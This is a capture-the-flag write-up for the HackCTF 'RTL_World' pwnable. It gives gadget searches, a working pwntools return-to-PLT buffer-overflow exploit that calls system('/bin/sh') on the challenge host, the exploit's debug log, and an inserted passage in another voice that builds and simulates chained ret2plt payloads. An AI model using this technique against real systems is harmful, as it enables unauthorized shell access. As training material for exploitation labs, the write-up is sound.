
[HackCTF] RTL_World

Intro

Hello :D

I really like this site, haha. It has a relaxing feel to it.

Moving right along, let's solve the first 200-point problem, RTL World!!

Write UP

root@goorm:/workspace/LCH_Server/HackCTF/11.RTL_world# ./rtl_world
Segmentation fault (core dumped)

???

Let's connect to it with nc.

NPC [Village Presient] :
Binary Boss made our village fall into disuse...
If you Have System Armor && Shell Sword.
You can kill the Binary Boss...
Help me Pwnable Hero... :(

Your Gold : 1000
======= Welcome to RTL World =======
1) Information the Binary Boss!
2) Make Money
3) Get the System Armor
4) Get the Shell Sword
5) Kill the Binary Boss!!!
6) Exit
====================================
>>>

Ah.. this looks tedious.

.
.
   0x08048be0 <+605>:   mov    DWORD PTR [esp],0x0
   0x08048be7 <+612>:   call   0x8048560 <read@plt>
   0x08048bec <+617>:   mov    eax,0x0
   0x08048bf1 <+622>:   jmp    0x8048c10 <main+653>
   0x08048bf3 <+624>:   mov    DWORD PTR [esp],0x80490b2
   0x08048bfa <+631>:   call   0x80485a0 <puts@plt>
   0x08048bff <+636>:   mov    DWORD PTR [esp],0x0
   0x08048c06 <+643>:   call   0x80485d0 <exit@plt>
   0x08048c0b <+648>:   jmp    0x8048a6e <main+235>
   0x08048c10 <+653>:   leave
   0x08048c11 <+654>:   ret

?? 654 lines?

.. I went through it statically piece by piece, and all I figured out was

that if you give 4 in the Get_Money() function it says "hidden option!!" and drops a huge pile of gold??

Since I couldn't analyze it dynamically, I had no idea what ebp-0xc, ebp-0x8 and ebp-0x4 were.

While puzzling over how to blow it up through read().., I took a look for gadgets.

root@goorm:/workspace/LCH_Server/HackCTF/11.RTL_world# ROPgadget --binary ./rtl_world --string "/bin/sh"
Strings information
============================================================
0x08048eb1 : /bin/sh
root@goorm:/workspace/LCH_Server/HackCTF/11.RTL_world# gdb -q ./rtl_world
Reading symbols from ./rtl_world...(no debugging symbols found)...done.
gdb-peda$ p system
$1 = {<text variable, no debug info>} 0x80485b0 <system@plt>
gdb-peda$ quit
root@goorm:/workspace/LCH_Server/HackCTF/11.RTL_world# rp-lin-x86 -f ./rtl_world -r 2 | grep "pop"
0x08048542: add esp, 0x08 ; pop ebx ; ret  ;  (1 found)
0x08048ca3: add esp, 0x08 ; pop ebx ; ret  ;  (1 found)
0x08048543: les ecx,  [eax] ; pop ebx ; ret  ;  (1 found)
0x08048ca4: les ecx,  [eax] ; pop ebx ; ret  ;  (1 found)
0x08048c7f: pop ebp ; ret  ;  (1 found)
0x08048545: pop ebx ; ret  ;  (1 found)
0x08048ca6: pop ebx ; ret  ;  (1 found)
0x08048c7e: pop edi ; pop ebp ; ret  ;  (1 found)

??? system() sits in the PLT, and the binary carries its own "/bin/sh" string? Then no libc leak is needed at all: overflow the read() buffer, return into system@plt, and hand it that string as the argument.

from pwn import *

context.log_level = "debug"

p = remote("ctf.j0n9hyun.xyz", 3010)

payload = b""
pr = 0x8048545       # pop ebx ; ret  (serves as system()'s return address)
system = 0x80485b0   # system@plt
binsh = 0x8048eb1    # "/bin/sh" inside the binary

p.recvuntil(b">>> ")
p.sendline(b"5")     # 5) Kill the Binary Boss!!!  -> reaches the read()

p.recvuntil(b" > ")

payload += b"A" * 144      # buffer + saved ebp, up to the saved return address
payload += p32(system)     # overwritten return address -> system@plt
payload += p32(pr)         # what system() returns to
payload += p32(binsh)      # system()'s first argument, read from [esp+4]

p.sendline(payload)

p.interactive()

?? Done!!

[+] Opening connection to ctf.j0n9hyun.xyz on port 3010: Done
[DEBUG] Received 0x1b bytes:
    '\n'
    '\n'
    'NPC [Village Presient] : '
[DEBUG] Received 0x176 bytes:
    '\n'
    'Binary Boss made our village fall into disuse...\n'
    'If you Have System Armor && Shell Sword.\n'
    'You can kill the Binary Boss...\n'
    'Help me Pwnable Hero... :(\n'
    '\n'
    'Your Gold : 1000\n'
    '======= Welcome to RTL World =======\n'
    '1) Information the Binary Boss!\n'
    '2) Make Money\n'
    '3) Get the System Armor\n'
    '4) Get the Shell Sword\n'
    '5) Kill the Binary Boss!!!\n'
    '6) Exit\n'
    '====================================\n'
    '>>> '
[DEBUG] Sent 0x2 bytes:
    '5\n'
[DEBUG] Received 0xb bytes:
    '[Attack] > '
[DEBUG] Sent 0x9d bytes:
    00000000  41 41 41 41  41 41 41 41  41 41 41 41  41 41 41 41  │AAAA│AAAA│AAAA│AAAA│
    *
    00000090  b0 85 04 08  45 85 04 08  b1 8e 04 08  0a           │····│E···│····│·│
    0000009d
[*] Switching to interactive mode
$ cat flag
[DEBUG] Sent 0x9 bytes:
    'cat flag\n'
[DEBUG] Received 0x22 bytes:
    ///flag!!

Exploit!! Anticlimactic, to say the least.
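To make the frame layout explicit, here is an added example of my own (not code from the write-up or from the challenge) that builds the same 32-bit ret2plt chain with nothing but struct and then walks it the way the CPU would, so the ordering can be checked offline before touching the remote. It goes a step beyond the write-up's single call: the same builder chains system("/bin/sh") followed by exit(0), using exit@plt from the main() disassembly and the pop ebx ; ret gadget as the return address that discards the previous call's one argument. The 144-byte offset and the addresses are the write-up's; build_chain, simulate and the dummy return value are my own assumptions, and the simulator assumes every callee returns normally.

```python
import struct

# Addresses from the write-up's gadget hunt (the binary is non-PIE, so they are fixed).
SYSTEM_PLT  = 0x080485b0   # system@plt
EXIT_PLT    = 0x080485d0   # exit@plt (seen in the main() disassembly)
POP_EBX_RET = 0x08048545   # pop ebx ; ret
BINSH       = 0x08048eb1   # "/bin/sh" inside the binary
OFFSET      = 144          # bytes from the read() buffer to the saved return address
DUMMY_RET   = 0xdeadbeef   # assumed filler when no pop gadget of the right arity is known


def p32(v):
    return struct.pack("<I", v & 0xffffffff)


def u32(b):
    return struct.unpack("<I", b)[0]


def build_chain(offset, calls, pop_gadgets):
    """Build a 32-bit ret2plt chain: padding | f1 | ret1 | args1 | f2 | ret2 | args2 ...

    calls:       [(function_address, [args]), ...] executed in order
    pop_gadgets: {n: address of a `pop*n ; ret` gadget}; the callee returns
                 into it, its n arguments get popped, and the next function
                 address is exactly at esp when the gadget's ret executes.
    """
    chain = b"A" * offset
    for func, args in calls:
        chain += p32(func)
        chain += p32(pop_gadgets.get(len(args), DUMMY_RET))
        for a in args:
            chain += p32(a)
    return chain


def simulate(payload, offset, arity, pop_gadgets):
    """Walk the chain as the CPU would after the overflowed function's `leave; ret`.

    arity: {function_address: number of stack arguments it reads}
    Returns [(function, [args as the callee sees them]), ...]: at entry esp
    points at the return address and argument k lives at [esp + 4*(k+1)].
    """
    pops = {addr: n for n, addr in pop_gadgets.items()}
    esp = offset
    trace = []

    def ret():
        nonlocal esp
        if esp + 4 > len(payload):
            return None                 # ran off the end of the payload
        v = u32(payload[esp:esp + 4])
        esp += 4
        return v

    eip = ret()                         # the overflowed function's own ret
    while eip is not None:
        if eip in pops:                 # pop*n ; ret -> skip the spent arguments
            esp += 4 * pops[eip]
        elif eip in arity:              # a PLT call: read its arguments off the stack
            n = arity[eip]
            if esp + 4 * (n + 1) > len(payload):
                break
            trace.append((eip, [u32(payload[esp + 4 * k:esp + 4 * k + 4]) for k in range(1, n + 1)]))
        else:
            break                       # jumped somewhere that is not part of the chain
        eip = ret()                     # the callee (or the gadget) returns
    return trace


if __name__ == "__main__":
    gadgets = {1: POP_EBX_RET}
    arity = {SYSTEM_PLT: 1, EXIT_PLT: 1}
    one = build_chain(OFFSET, [(SYSTEM_PLT, [BINSH])], gadgets)       # the write-up's payload
    two = build_chain(OFFSET, [(SYSTEM_PLT, [BINSH]), (EXIT_PLT, [0])], gadgets)
    for name, chain in (("single", one), ("chained", two)):
        calls = simulate(chain, OFFSET, arity, gadgets)
        print(name, [(hex(f), [hex(a) for a in args]) for f, args in calls])
```

The single-call chain reproduces byte for byte what the debug log above shows being sent. Swapping the return address and the argument (system | "/bin/sh" | gadget) makes the simulator report system() receiving the gadget address as its argument, which is the classic mistake the walk-through is meant to catch.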

Wrap-up

I was planning to earn gold, buy the System Armor and the Shell Sword, and then hit the boss with Attack,

but it turned out there was a better sword lying right there on the floor.

from pwn import *

context.log_level = "debug"

p = remote("ctf.j0n9hyun.xyz", 3010)

payload = b""
pr = 0x8048545       # pop ebx ; ret
system = 0x80485b0   # system@plt
binsh = 0x8048eb1    # "/bin/sh" inside the binary

p.recvuntil(b">>> ")
p.sendline(b"2")     # 2) Make Money

p.recvuntil(b">>> ")
p.sendline(b"4")     # the hidden option in Get_Money(): a pile of gold

p.recvuntil(b">>> ")
p.sendline(b"1")     # 1) Information the Binary Boss!

p.recvuntil(b"live in 0x")
boss = int(p.recv(8), 16)

log.info("boss lives in " + hex(boss))

p.recvuntil(b">>> ")
p.sendline(b"3")     # 3) Get the System Armor

p.recvuntil(b"Armor : 0x")
system_armor = int(p.recv(8), 16)

log.info("System Armor = " + hex(system_armor))

p.recvuntil(b">>> ")
p.sendline(b"4")     # 4) Get the Shell Sword

p.recvuntil(b"Sword : 0x")
shell_sword = int(p.recv(8), 16)

log.info("Shell Sword = " + hex(shell_sword))

p.recvuntil(b">>> ")
p.sendline(b"5")     # 5) Kill the Binary Boss!!!

p.recvuntil(b" > ")

# how to use read()...

That's where I was at.

Thank you.. :D
